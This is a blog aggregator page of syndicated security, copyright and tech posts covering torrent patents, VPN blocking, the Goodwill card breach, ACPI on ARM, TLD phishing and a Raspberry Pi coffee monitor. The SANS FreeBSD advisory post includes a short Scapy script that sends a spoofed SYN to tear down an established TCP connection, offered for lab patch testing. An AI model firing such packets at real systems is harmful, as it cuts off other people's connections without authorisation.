Posts tagged ‘Other’

TorrentFreak: AT&T Patents Technology to Keep Torrent Files Alive

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

In recent years the intellectual property division of AT&T has patented quite a few unusual inventions. Today we can add another to the list after the telecoms company was granted a patent which aims to keep torrent files available for as long as possible.

In the patent (pdf), which was awarded yesterday, the ISP points out that BitTorrent is a very effective way of sharing files online. However, AT&T also signals some drawbacks, including the fact that some torrent swarms stop working because there are no complete copies of the file available.

“As more and more peers download a complete copy of the file, the performance of the torrent deteriorates to the point that it becomes difficult for the file to be located and downloaded. As a result, current BitTorrent systems are not desirable for downloading older files,” the patent reads.

Since there are often many swarms downloading the same content via different trackers, it could be that the file lives on elsewhere. Similarly, other peers might be willing to start seeding the dead torrent again. AT&T’s patent pairs these sources to increase the availability of files downloaded via BitTorrent.

AT&T’s torrent patent

The patent proposes to add “collaboration information” which may be obtained from each peer when it joins a torrent swarm. If a torrent has no active seeds available, this information can point the downloader to “dormant peers” or external trackers that still have active seeders.

“If the file is not available at an active peer, the tracker node has two options; it may contact some of the listed dormant peers to see if they are willing to make the file available, and/or it may contact a remote tracker node listed for the file,” the patent reads.

“If the file is made available by a dormant peer and/or at a remote torrent, the local peer can then establish a peer-to-peer communication with the dormant peer or a peer on the remote torrent, and download the file therefrom. As a result, the local peer can locate and download files that are not available on its current torrent from both dormant peers and peers in other torrents.”

The idea to point people to other trackers is not new. Most torrents come with multiple trackers nowadays to ensure that a file remains available for as long as possible. AT&T’s proposed invention would automate this feature.

The idea to contact “dormant peers” is more novel. In short, that means that people who previously downloaded a file, but are no longer seeding it, can get a request to make it available again.
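
Reduced to a sketch, the decision flow the patent describes looks something like the following. All names and data structures here are invented for illustration; none of them come from AT&T's filing.

# Hypothetical sketch of the tracker fallback flow described in the patent.
# Peers are modeled as plain dicts; nothing here is taken from the filing.
def locate_sources(active_peers, dormant_peers, remote_trackers):
    """Return peers believed able to serve a complete copy of the file."""
    seeds = [p for p in active_peers if p.get("complete")]
    if seeds:
        return seeds
    # Option 1: ask dormant peers (past downloaders) to start seeding again.
    willing = [p for p in dormant_peers if p.get("willing_to_reseed")]
    if willing:
        return willing
    # Option 2: fall back to peers known to remote trackers for the same file.
    for tracker in remote_trackers:
        seeds = [p for p in tracker["peers"] if p.get("complete")]
        if seeds:
            return seeds
    return []  # no source found; the torrent is dead everywhere

# Example: no active seeds, but one dormant peer agrees to return.
print(locate_sources(
    active_peers=[{"complete": False}],
    dormant_peers=[{"willing_to_reseed": True}],
    remote_trackers=[],
))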

Whether the ISP has any real-life applications for its invention is as yet unknown. The current patent was granted this week, but the first application dates back to 2005, a time when BitTorrent wasn’t quite as mainstream as it is today.

The patent certainly doesn’t mean that the ISP encourages sharing copyrighted files. Among other anti-piracy innovations, AT&T previously patented systems to track content being shared via BitTorrent and other P2P networks and report those offenders to the authorities.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Copyright Holders Want Netflix to Ban VPN Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

With the launch of legal streaming services such as Netflix, movie and TV fans have less reason to turn to pirate sites.

At the same time, however, these legal options attract people from countries where such services are more limited. This is the case in Australia, where up to 200,000 people are estimated to use the U.S. version of Netflix.

Although Netflix has geographical restrictions in place, these are easy to bypass with a relatively cheap VPN subscription. To keep these foreigners out, entertainment industry companies are now lobbying for a global ban on VPN users.

Simon Bush, CEO of AHEDA, an industry group that represents Twentieth Century Fox, Warner Bros., Universal, Sony Pictures and other major players, said that some members are actively lobbying for such a ban.

Bush didn’t name any of the companies involved, but he confirmed to CNET that “discussions” to block Australian access to the US version of Netflix “are happening now”.

If implemented, this would mean that VPN users worldwide would no longer be able to access Netflix. That includes the millions of Americans who pay for a legitimate account. They could still access Netflix, but would not be allowed to do so securely via a VPN.

According to Bush, the discussions to keep VPN users out are not tied to Netflix’s arrival in Australia. The distributors and other rightsholders argue that they are already being deprived of licensing fees because some Aussies ignore local services such as Quickflix.

“I know the discussions are being had…by the distributors in the United States with Netflix about Australians using VPNs to access content that they’re not licensed to access in Australia,” Bush said.

“They’re requesting for it to be blocked now, not just when it comes to Australia,” he adds.

While blocking VPNs would solve the problem for distributors, it creates a new one for VPN users in the United States.

The same happened with Hulu, which a few months ago started to block visitors who access the site through a VPN service. That blockade also applies to hundreds of thousands of U.S. citizens.

Hulu’s blocklist currently covers the IP-ranges of all major VPN services. People who try to access the site through one of these IPs are not allowed to view any content on the site, and receive the following notice instead:

“Based on your IP-address, we noticed that you are trying to access Hulu through an anonymous proxy tool. Hulu is not currently available outside the U.S. If you’re in the U.S. you’ll need to disable your anonymizer to access videos on Hulu.”

It seems that VPNs are increasingly attracting the attention of copyright holders. Just a week ago BBC Worldwide argued that ISPs should monitor VPN users for excessive bandwidth use, on the assumption that heavy users are pirates.

Considering the above, we can expect the calls for VPN bans to increase in the near future.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Critical Update for Adobe Reader & Acrobat

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

Users can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.

SANS Internet Storm Center, InfoCON: green: FreeBSD Denial of Service advisory (CVE-2004-0230), (Tue, Sep 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A vulnerability has been discovered by Jonathan Looney at the Juniper SIRT in FreeBSD (the base for Junos and many other products) in the way that FreeBSD processes certain TCP packets (https://www.freebsd.org/security/advisories/FreeBSD-SA-14:19.tcp.asc). If you send TCP SYN packets for an existing connection (i.e. the correct source IP, source port, destination IP, destination port combination), the operating system will tear down the connection.

The attack is similar to the “Slipping in the Window” attack described back in 2004 by Paul Watson (http://packetstormsecurity.com/files/author/3245/), but uses SYN packets instead of RST. One of the Handlers has successfully reproduced the attack in their lab.
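
For those who want to verify vendor patches against a lab host, the packet is trivial to construct. Here is a minimal Scapy sketch; all addresses and ports are placeholders, and you would need the four-tuple of a live connection to the test host.

# Lab-only sketch of the FreeBSD-SA-14:19.tcp condition: a spoofed SYN
# matching an established connection's four-tuple. Requires the scapy
# package and root privileges; every value below is a placeholder.
from scapy.all import IP, TCP, send

src_ip, src_port = "192.0.2.20", 54321   # client side of the victim connection
dst_ip, dst_port = "192.0.2.10", 22      # server side (the FreeBSD test host)

pkt = IP(src=src_ip, dst=dst_ip) / TCP(sport=src_port, dport=dst_port,
                                       flags="S")
send(pkt, verbose=False)   # a vulnerable stack may tear the session down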

For those of you who think you don’t have FreeBSD in your environment: you probably do. A number of products use FreeBSD as their base operating system. A few that spring to mind are OS X, Blue Coat, Check Point, NetScaler and more (a partial list is here: http://en.wikipedia.org/wiki/List_of_products_based_on_FreeBSD).

Keep an eye out for updates from your vendors; Juniper’s is here: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10638

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Matthew Garrett: ACPI, kernels and contracts with firmware

This post was syndicated from: Matthew Garrett and was written by: Matthew Garrett. Original post: at Matthew Garrett

ACPI is a complicated specification – the latest version is 980 pages long. But that’s because it’s trying to define something complicated: an entire interface for abstracting away hardware details and making it easier for an unmodified OS to boot diverse platforms.

Inevitably, though, it can’t define the full behaviour of an ACPI system. It doesn’t explicitly state what should happen if you violate the spec, for instance. Obviously, in a just and fair world, no systems would violate the spec. But in the grim meathook future that we actually inhabit, systems do. We lack the technology to go back in time and retroactively prevent this, and so we’re forced to deal with making these systems work.

This ends up being a pain in the neck in the x86 world, but it could be much worse. Way back in 2008 I wrote something about why the Linux kernel reports itself to firmware as “Windows” but refuses to identify itself as Linux. The short version is that “Linux” doesn’t actually identify the behaviour of the kernel in a meaningful way. “Linux” doesn’t tell you whether the kernel can deal with buffers being passed when the spec says it should be a package. “Linux” doesn’t tell you whether the OS knows how to deal with an HPET. “Linux” doesn’t tell you whether the OS can reinitialise graphics hardware.

Back then I was writing from the perspective of the firmware changing its behaviour in response to the OS, but it turns out that it’s also relevant from the perspective of the OS changing its behaviour in response to the firmware. Windows 8 handles backlights differently to older versions. Firmware that’s intended to support Windows 8 may expect this behaviour. If the OS tells the firmware that it’s compatible with Windows 8, the OS has to behave compatibly with Windows 8.

In essence, if the firmware asks for Windows 8 support and the OS says yes, the OS is forming a contract with the firmware that it will behave in a specific way. If Windows 8 allows certain spec violations, the OS must permit those violations. If Windows 8 makes certain ACPI calls in a certain order, the OS must make those calls in the same order. Any firmware bug that is triggered by the OS not behaving identically to Windows 8 must be dealt with by modifying the OS to behave like Windows 8.

This sounds horrifying, but it’s actually important. The existence of well-defined[1] OS behaviours means that the industry has something to target. Vendors test their hardware against Windows, and because Windows has consistent behaviour within a version[2] the vendors know that their machines won’t suddenly stop working after an update. Linux benefits from this because we know that we can make hardware work as long as we’re compatible with the Windows behaviour.

That’s fine for x86. But remember when I said it could be worse? What if there were a platform that Microsoft weren’t targeting? A platform where Linux was the dominant OS? A platform where vendors all test their hardware against Linux and expect it to have a consistent ACPI implementation?

Our even grimmer meathook future welcomes ARM to the ACPI world.

Software development is hard, and firmware development is software development with worse compilers. Firmware is inevitably going to rely on undefined behaviour. It’s going to make assumptions about ordering. It’s going to mishandle some cases. And it’s the operating system’s job to handle that. On x86 we know that systems are tested against Windows, and so we simply implement that behaviour. On ARM, we don’t have that convenient reference. We are the reference. And that means that systems will end up accidentally depending on Linux-specific behaviour. Which means that if we ever change that behaviour, those systems will break.

So far we’ve resisted calls for Linux to provide a contract to the firmware in the way that Windows does, simply because there’s been no need to – we can just implement the same contract as Windows. How are we going to manage this on ARM? The worst case scenario is that a system is tested against, say, Linux 3.19 and works fine. We make a change in 3.21 that breaks this system, but nobody notices at the time. Another system is tested against 3.21 and works fine. A few months later somebody finally notices that 3.21 broke their system and the change gets reverted, but oh no! Reverting it breaks the other system. What do we do now? The systems aren’t telling us which behaviour they expect, so we’re left with the prospect of adding machine-specific quirks. This isn’t scalable.

Supporting ACPI on ARM means developing a sense of discipline around ACPI development that we simply haven’t had so far. If we want to avoid breaking systems we have two options:

1) Commit to never modifying the ACPI behaviour of Linux.
2) Expose an interface that indicates which well-defined ACPI behaviour a specific kernel implements, and bump that whenever an incompatible change is made. Backward compatibility paths will be required if firmware only supports an older interface.

(1) is unlikely to be practical, but (2) isn’t a great deal easier. Somebody is going to need to take responsibility for tracking ACPI behaviour and incrementing the exported interface whenever it changes, and we need to know who that’s going to be before any of these systems start shipping. The alternative is a sea of ARM devices that only run specific kernel versions, which is exactly the scenario that ACPI was supposed to be fixing.

[1] Defined by implementation, not defined by specification
[2] Windows may change behaviour between versions, but always adds a new _OSI string when it does so. It can then modify its behaviour depending on whether the firmware knows about later versions of Windows.


SANS Internet Storm Center, InfoCON: green: https://yourfakebank.support — TLD confusion starts!, (Tue, Sep 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Pretty much ever since the new top level domain (TLD) “.biz” went online some years ago and the only ones buying domains in this space turned out to be the scammers, we kinda knew what would happen when ICANN’s latest folly and money-grab went live. A number of the “new” top level domains, like “.support”, “.club”, etc., have now come online. And again, it seems like only the crooks are buying.

We are currently investigating a wave of phishing emails that try to lure the user to a copy of the Bank of America website. The main difference, of course, is that any login credentials entered do not end up with Bank of America, but rather with some crooks, who then help themselves to the savings.

Phishing emails per se are nothing new. But it appears that URLs like the one used in this phish have a higher success rate with users. I suspect this is because the shown URL “looks different” but actually matches the linked URL, so the old common “wisdom” of hovering the mouse pointer over the link to look for destinations pointing to odd places won’t help here.

But wait, there’s more! Since the crooks in this case own the domain, and can trivially pass the so-called “domain control validation” employed by some CAs, they actually managed to obtain a real, valid SSL certificate!

Quoting from the Certificate Authority’s web site:

Comodo Free SSL is a fully functional Digital Certificate, recognized and trusted by 99.9% of browsers. Your visitors will see the golden padlock and won’t see security warnings. What will you get:

  • Ninety day free SSL Certificate (other CAs offer 30 days maximum.)
  • Issued online in minutes with no paperwork or delays
  • Highest strength 2048 bit signatures / 256 bit encryption
  • Signed from the same trusted root as our paid certificates
  • Recognized by all major browsers and devices

They don’t mention why they think any of this is a good idea.

Addition of SSL to the phish means that another “scam indicator” that we once taught our users is also no longer valid. When a user clicks on the link in the phishing email, the browser will actually show the “padlock” icon of a “secure site”.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Breach at Goodwill Vendor Lasted 18 Months

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

On July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to help its member organizations respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the installation of a “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K Systems’ full statement is posted here.

ANALYSIS

C&K Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how its systems were compromised, information that could no doubt be helpful to other organizations in preventing future breaches. It’s also not clear whether the other two organizations impacted by this breach have disclosed or will disclose.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1” includes the cardholder’s name, account number and other data. “Track 2” contains the cardholder’s account, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together. Source: Appsecconsulting.com

Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.
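
To make that concrete, here is a toy parser following the standard Track 2 field order (the card number below is a well-known test PAN, not a real account). Note that no field carries the cardholder’s name, which is exactly why Track 2-only theft often escapes breach-notice statutes.

# Toy Track 2 parser: sentinels are ';' and '?', and the PAN is separated
# from the remaining fields by '='. There is no cardholder-name field.
def parse_track2(raw):
    data = raw.strip().lstrip(";").rstrip("?")
    pan, rest = data.split("=", 1)
    return {
        "pan": pan,                 # primary account number
        "expiry": rest[0:4],        # YYMM
        "service_code": rest[4:7],
        "discretionary": rest[7:],  # issuer data (PVV/CVV1 may live here)
    }

# Standard Visa test number, not a real account.
print(parse_track2(";4111111111111111=1512101000000000000?"))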

ENCRYPTION, ENCRYPTION, ENCRYPTION

Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party processors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K Systems says it was relying on hardware and software that met current security industry standards but was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scrapping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.

TorrentFreak: Search Engines Can Diminish Online Piracy, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

In recent years Hollywood and the music industry have taken a rather aggressive approach against Google. The entertainment industry companies believe that the search engine isn’t doing enough to limit piracy, and have demanded more stringent measures.

One of the suggestions often made is to remove or demote pirate sites in search results. A lower ranking would lead fewer people to pirate sources, and promoting legal sources would have a similar effect.

Google previously said it would lower the ranking of sites based on DMCA complaints, but thus far these changes have had a limited effect. A few weeks ago the company also began promoting legal options but this effort is in the testing phase for now.

The question that remains is whether these changes would indeed decrease piracy. According to new research from Carnegie Mellon University, they can.

In a paper titled “Do Search Engines Influence Media Piracy?” the researchers ran two experiments where they let participants use a custom search engine to find a movie they wanted to watch. The respondents could pick from a list of 50 titles and received a $20 prepaid virtual Visa card as compensation.

All search results were pulled from a popular search engine. In the control condition the results were not manipulated, but in the “legal” and “infringing” conditions the first page only listed “legal” (e.g. Amazon) and neutral (e.g. IMDb) sites, or “infringing” (e.g. Pirate Bay) and neutral sites, respectively.

While it’s quite a simple manipulation, and even though users could still find legal and pirated content in all conditions, the results are rather strong.

Of all participants who saw the standard results, 80% chose to buy the movie via a legal option. This went up to 94% if the results were mostly legal, and dropped to 57% for the group who saw mostly infringing results on the first page.

To Pirate or Not to Pirate

TorrentFreak contacted Professor Rahul Telang, who says that the findings suggest that Google and other search engines have a direct effect on people’s behavior, including the decision to pirate a movie.

“Prominence of legal versus infringing links in the search results seems to play a vital role in users’ decision to consume legal versus pirated content. In particular, demoting infringing links leads to a lower rate of consumption of pirated movie content in our sample,” he notes.

In a second study the researchers carried out a slightly modified version of the experiment with college students, a group that tends to pirate more frequently. The second experiment also added two new conditions where only the first three results were altered, to see if “mild” manipulations would also have an effect.

The findings show that college students indeed pirate more as only 62% went for the legal option in the control condition. This percentage went up gradually to 76% with a “mild legal” manipulation, and to 92% in the legal condition. For the infringing manipulations the percentages dropped to 48% and 39% respectively.

To Pirate or Not to Pirate, take two

According to Professor Telang, their findings suggest that even small changes can have a significant impact and that altering search algorithms can be instrumental in the fight against online piracy.

“The results suggest that the search engines may play an important role in the fight against intellectual property theft,” Telang says.

It has to be noted that Professor Telang and his colleagues received a generous donation from the MPAA for their research program. However, the researchers maintain that their work is carried out independently.

As a word of caution the researchers point out that meddling with search results in the real world may be much more challenging. False positives could lead to significant social costs and should be avoided, for example.

This and other caveats aside, the MPAA and RIAA will welcome the study as a new piece of research they can wave at Google and lawmakers. Whether that will help them get what they want remains to be seen, though.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Manage Multiple Logical Volume Management Disks using Striping I/O

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Tecmint. Original post: at Linux How-Tos and Linux Tutorials

In this article, we are going to see how logical volumes write data to disk with striped I/O. Logical Volume Management has a cool feature that can write data across multiple disks by striping the I/O. What is LVM Striping? LVM Striping is the feature that writes the…

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

 
Read more at TecMint

TorrentFreak: How Publisher Harper Collins Tackles eBook Piracy

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

One of the key elements enabling piracy is file size. Since music files are relatively small, unauthorized content can be distributed and accessed using a wide array of methods, from torrents and direct storage sites through instant messaging and humble email.

Ebooks share the same characteristics. As a result, they are widely pirated and made available on thousands of sites and services in a wide range of convenient formats. This is something publisher HarperCollins is trying to do something about by attacking the problem from a number of different directions.

As part of its latest drive, this week the company announced a collaboration with LibreDigital, a leading provider of distribution and fulfillment services for ebook retailers. Together they adopted a new watermarking solution from anti-piracy company Digimarc.

Called Guardian Watermarking for Publishing, the system embeds all but invisible markers into ebooks. Digimarc then trawls the web looking for leaked content containing the watermarks. Once found, the anti-piracy company reports the unique identifiers back to HarperCollins, which can match them against its own transaction records. This enables the company to identify the source of the leaked material wherever it occurred in the company’s supply chain.
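
Digimarc doesn’t disclose how its marks are embedded, so the following toy sketch only illustrates the embed-and-match workflow described above. It hides a transaction ID in zero-width characters, something a real transcoding-resistant scheme would never rely on, and every name here is invented.

# Deliberately naive illustration of embed-and-match watermarking;
# NOT Digimarc's method. The ID is encoded as zero-width characters.
ZW = {"0": "\u200b", "1": "\u200c"}          # zero-width space / non-joiner
ZW_REV = {v: k for k, v in ZW.items()}

def embed(text, transaction_id):
    bits = format(transaction_id, "032b")
    return text + "".join(ZW[b] for b in bits)

def extract(text):
    bits = "".join(ZW_REV[c] for c in text if c in ZW_REV)
    return int(bits, 2) if bits else None

marked = embed("Chapter One. It was a dark and stormy night...", 48613)
print(extract(marked))  # -> 48613, which maps back to a sales-channel record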

Speaking with TorrentFreak, HarperCollins said that tracking these pre-consumer leaks provides intelligence to prevent them happening again.

“We have had leaks in the past in the final stages of our supply chain – via isolated instances of early releases by retailers. We therefore intend to be able to track these potential leaks in the future – especially now that our digital supply chain extends to many partners in many markets,” a spokesperson said.

“[The system] empowers us to go back to the source of the problem (ie identify the source) and find solutions to prevent this from happening in the future.”

Of course, pirates are known to attack watermarks by utilizing various methods including transcoding of files. Speaking with TF, Digimarc say their system is up to the challenge.

“The embedded identifiers are designed to survive conversion and manipulation,” a spokesperson said.

Interestingly, HarperCollins are going out of their way to assure consumers that these watermarks won’t affect their privacy.

“This solution does not facilitate tracing back to the individual purchaser, only to the sales channel through which it was purchased,” a spokesperson explained. “And Digimarc itself stores absolutely no personally identifiable information or purchase information in the implementation of the watermark.”

That’s not to say that consumer leaks aren’t part of the problem; they are. But HarperCollins says it employs separate strategies for pre- and post-consumer piracy.

“Both [types of piracy] merit being addressed and we have different solutions for each. For the supply chain we will watermark; for the end consumer the retailers are applying DRM and we are employing Digimarc to issue takedowns and ensure site compliance – to protect our authors’ content,” the company said.

Like many content companies, HarperCollins regularly sends takedown notices to many websites but those it sends to Google are the most visible. To date the company has sent more than 250,000 to the world’s leading search engine, but what effect has that had on availability?

“The aim of our participation in Google’s copyright removal program is to reduce the visibility and availability of infringing content. The desired effect is clearing illegal download links from its SERP. We believe this to be an effective way to discourage piracy,” the company told TF.

We asked HarperCollins how it would rate Google in terms of anti-piracy cooperation, but the publisher declined to comment. The company also wouldn’t be drawn on how many notices it sends to other search engines and ‘pirate’ sites.

“We do not comment on the amount of notices – but we do want to assure authors that their entire catalog is covered by our work with Digimarc,” they said.

As ebooks continue to gain traction, publishers like HarperCollins will be keen not to fall into the same traps as the music industry. It could be argued that, actioned properly, takedowns are the most consumer-friendly option. And watermarking shouldn’t become too unpopular, as long as it doesn’t extend to identifying the public. DRM, however, is rarely appreciated by the paying public.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: Fresh Coffee at Mailchimp

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Ben: Here’s a guest post from Steven Sloan, a developer at MailChimp.


Grounds for innovation

Here at MailChimp, we’re always trying to listen hard and change fast. Turns out, this requires a good bit of coffee. Each department has its own take on how to keep the stuff flowing, mostly with the standard Bunn-O-Matic commercial machines. A few folks regularly avail themselves of our espresso setup. The developers fill two airpots—one with regular, the other double strength.

And then there’s the marketing team and our precious Chemex.

We make a pour-over pot once every hour or so, all day long, 5 days a week, 50-something weeks a year. Last December, when we were gathering data for our annual report, we got curious about how many Fresh Pots that might amount to. We tried to count it up, but begrudgingly had to accept the fact we didn’t have a good measure beyond pounds consumed. We even tried to keep track with a bean counter, but that didn’t last long.

For a while, the exact nature of our coffee consumption seemed like it would remain just another mystery of the universe. But then one day, talking to Mark while waiting on yet another Fresh Pot, I said, “Hey, I bet we could track the temperature with a Raspberry Pi and post to the group chat when there’s a fresh one.”

I wasn’t too serious, but Mark’s response was one often heard around MailChimp when ridiculous projects are proposed: “Sounds great, just let me know what you need to get it done.”

A few days later, I had a materials list drawn up from Adafruit’s thermometer tutorial, and we were off to the races.


A fresh Pi

With a Raspberry Pi in hand, the first thing I did was add a script to the boot process that used Mandrill to email me the Pi’s IP address, so I could find it on our network without trouble.
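
The script itself isn’t shown here, but a plausible reconstruction looks like this Python sketch (Mandrill’s messages/send endpoint takes a JSON body of key plus message; the key, addresses, and even the choice of language are assumptions):

# Hypothetical "mail me my IP at boot" script; key and addresses are fake.
import socket
import requests

def current_ip():
    # Standard trick: open a UDP socket outward and read the local address.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8", 53))
    ip = s.getsockname()[0]
    s.close()
    return ip

requests.post(
    "https://mandrillapp.com/api/1.0/messages/send.json",
    json={
        "key": "YOUR_MANDRILL_API_KEY",
        "message": {
            "from_email": "coffeepi@example.com",
            "to": [{"email": "you@example.com"}],
            "subject": "Coffee Pi is up",
            "text": "Find me at %s" % current_ip(),
        },
    },
)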

Then, I had to tackle the problem of detecting pot states with only a single datapoint: current temperature. I hoped that comparing the running averages of different time spans would be enough to determine the pot’s status. (The average Chemex temperature over the course of a few minutes, for instance, would tell us something different than the average temperature over the course of an hour.)
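
That idea translates to a few lines in any language. A rough sketch follows; the window sizes and the brewing threshold are invented for illustration, and as described next, the actual implementation ended up in Clojure.

# Two-window running-average sketch; thresholds are invented placeholders.
from collections import deque

minute = deque(maxlen=60)    # one reading per second -> last minute
hour = deque(maxlen=3600)    # -> last hour

def on_reading(temp_c):
    minute.append(temp_c)
    hour.append(temp_c)
    minute_avg = sum(minute) / len(minute)
    hour_avg = sum(hour) / len(hour)
    # A short-term average well above the long-term one means the
    # temperature is climbing fast: a pot is probably brewing.
    if minute_avg - hour_avg > 5.0:
        return "brewing"
    return "unknown"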

